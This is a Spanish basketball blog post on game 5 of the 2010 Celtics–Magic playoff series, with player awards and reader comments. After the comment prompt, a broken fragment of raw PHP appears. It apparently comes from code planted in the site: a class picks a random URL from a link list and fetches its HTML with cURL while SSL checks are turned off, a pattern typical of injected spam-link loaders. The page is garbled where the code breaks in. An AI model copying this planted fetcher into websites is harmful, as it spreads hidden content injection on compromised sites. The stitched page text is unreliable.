Playoffs 26/05/2010: De resurrecciones y eventualidades

27 de May de 2010 por TheDeerHunter

Los Celtics cayeron en Orlando. Hasta aquí todo normal. Podríamos decir que resultaría más atípico que los Magic no hubieran logrado ganar ni uno sólo de los 3 partidos que han jugado en casa en esta serie, por mucho orgullo celtic, defensa Rivers o lo que haya querido haber por medio. Teniendo el Garden para rematar en el 6º no debería ser preocupante. En este punto quizás lo debió ser más el haber perdido el anterior, con los de Florida prácticamente noqueados y con las vacaciones ahí, al alcance de la mano.

No remataron. De alguna manera los pupilos de Van Gundy lograron sacar fuerzas de flaqueza para sacar el puntito en Boston cuando nadie menos lo esperaba. Regresando a Orlando, con vidilla y el amparo de su gente, comienzan a observarse signos muy positivos para unos y preocupantes para los otros. Rashard Lewis, Barnes, Pietrus… incluso Brandon Bass cuya participación había sido peor que marginal, funcionaron todos juntos por primera vez en la eliminatoria, con la consiguiente inyección de confianza. Esa es precisamente la gran baza de Van Gundy y de los Magic. Llega algo tarde pero aquí está. ¿Quién lo hubiera dicho tras los tres primeros partidos? Añadir la gran actuación de Howard, Nelson y del siempre infravalorado JJ Redick, y tienes el verdadero nivel de este equipo.

Bueno, nadie lo ha logrado antes, pero ahora mismo todo gira a un partido. 48 minutos donde puede pasar cualquier cosa. Seguro que más de uno en Orlando lo hubiera firmado sin pensárselo hace muy poco. Con la tontería, como quien no quiere la cosa, se le ha girado la tostada a unos Celtics aún con ventaja, no lo perdamos de vista. Por otro lado, contando el pasado año, los Magic llevan 4 “match balls” seguidos superados contra ellos.

A los verdes no les convenía en ninguno de los casos una serie larga. Se aprecian signos de desgaste evidentes, lógicos a estas alturas y con la configuración de plantilla que tienen. Por ahí no hay ninguna duda que los Magic están mejor preparados. Ahora empiezan a pesar mucho ciertos detalles: Cruzada de cables de Kedrick Perkins, dos técnicas y a la calle, con la más que posible sanción por delante. Un serio contratiempo.

Y ahora crecen los enanos. Menudo susto nos llevamos con Big Baby viéndole correr a la deriva, semi-inconsciente tras un golpazo en la cabeza por parte de Supermán. El árbitro Joe Crawford tuvo que salvarle de un buen batacazo contra el suelo. Menudos reflejos y menuda fuerza para sujetar al cachalote ese. No fue el único incidente, también Marquis Daniels. Observación y duda para el próximo decisivo choque. Todo imponderables para el equipo de Boston. Mucha preocupación… por no haber logrado cerrar la eliminatoria a tiempo.

PREMIOS

MVP: Sin Kendrick Perkins rondando la zona, Dwight Howard pudo campar a sus anchas. 21 puntos, 10 rebotes y 5 tapones.

Sorpresa: En los  18 minutos que jugó Rasheed Wallace anotó 21 puntos, convirtiéndose en el máximo encestador del equipo. Un día de aquellos que la Virgen desciende de los cielos para verte.

Decepción: Los 2 últimos partidos de Vince Carter no son precisamente para emmarcar. Si en el anterior se quedó en 3 puntos, aye rsólo anotó 8  con un 3 de 10 en tiro. Las comparaciones con Turkoglu son odiosas.

Esfuerzo en vano: Wallace, Pierce y Rondo fueron los que mantuvieron a los Celtics con vida durante el partido pero tampoco lo hicieron con demasiada convicción.

Y MAÑANA…

2-2 y algunas dudas por resolver. Conociendo a los Lakers seguramente ganarán al amparo de su público y luego resolverán en Phoenix, cuando más quema el balón. Cualquiera otra sucesión de acontecimientos que se aparte de este guión nos ofrecerá jornadas de emoción extra.

Comenta

10 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Ay ay ay…

    xD

      Citar

  2. sergio dice:
    #2

    Cada partido que pasa los Orlando lo están haciendo mejor. Ayer, desde el principio del partido se les vió dominando y con más fluidez que Boston.
    Puede suceder un milagro? Lo dudo, pero soy mucho más crédulo que hace unos días.
    Menudo susto lo de Davis, esperemos que no le pase nada, especialmente para ayudar a su equipo ante una eventual sanción a Perkins

      Citar

  3. TheDeerHunter dice:
    #3

    Desde luego… menudo marrón si tuvieran que jugarse las castañas sin Perkins ni Davis. Sólo Wallace… que este año está en plan Odom en cuanto a irregularidad, pero con peor potencial.

    Bueno, también tienen a Shelden Williams :/

    De todas formas sí se espera la participación de Davis

      Citar

  4. Love Denise dice:
    #4

    uf, 2º match ball salvado
    A Davis que no le pase nada, pero que no juegue jeje, sobre Perkins, me pareció rigurosa su expulsión, aunque depende de lo que le haya dicho al arbitro; Walace también acabó con molestias, veremos si puede jugar o no.
    En caso de que jueguen, me temo lo peor para el 6º. Los arbitrajes están siendo un poco caseros, y tengo la sensación de que van a permitir la leña sobre Howard. Ante eso, los Magic deberían intentar poner mucha tierra de por medio, porque en un final apretado, pienso que los Celtics tienen todas las de ganar.
    Muy buen juego colectivo de Orlando hoy, cosiendo a triples al rival, y con todo el mundo aportando algo, si se hubiera jugado así desde el priemr partido, esta serie se hubiera acabado ya.
    Hoy se tapó bien a Ray allen, pero es imperdonable que Wallace nos haga este traje, .e insisto en lo de Garnett, muy mal ofensivamente en toda la serie.

      Citar

  5. CAMPO2 dice:
    #5

    Hola gente hace dias que no comento nada, pero os sigo muy atentamente.

    ¿No creeis que glen davis tiene problemas de equilibrio?cada vez que veo un partido de boston lo veo varias veces por los suelos, vamos que a poco que lo tocan u poco cuando esta en movimiento se da un revolcon.

    Como comentais, orlando esta despertando tarde pero aun confio en que Carter tiene que hacer su partido bueno que hace un tiempo que no hace y espero que sea el siguiete.

      Citar

  6. MagicJohnson32 dice:
    #6

    CAMPO2, cuando comentas el problema de Davis (que a poco que lo tocan se da un revolcón), me recuerda bastante a Wade, jeje…

      Citar

  7. CAMPO2 dice:
    #7

    Magic la diferencia es que a wade le sacuden entrando a canasta y salta a un rebote, toca hombro con hombro y le cuesta dios y ayuda caer erguido, jejjeej

      Citar

  8. mmmm dice:
    #8

    Joer, que las vacaciones estaban muy cerca!

      Citar

  9. Viva_Dirk dice:
    #9

    La expulsión de Perkins fue muy rigurosa, la falta no es y en las protestas no dice nada a ningun árbitro sino que se simplemente hace gestos, no es para técnica y menos aun para segunda técnica.

    Sin su trabajo sobre Howard el 6º partido es mas que interesante.

      Citar

  10. CAMPO2 dice:
    #10

    A Perkins le han quitado la 2 tecnica por lo que mañana jugara y a pierce una personal en el 4º partido se la transforman en flgrante, que rollo esto de rearbitrar partidos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>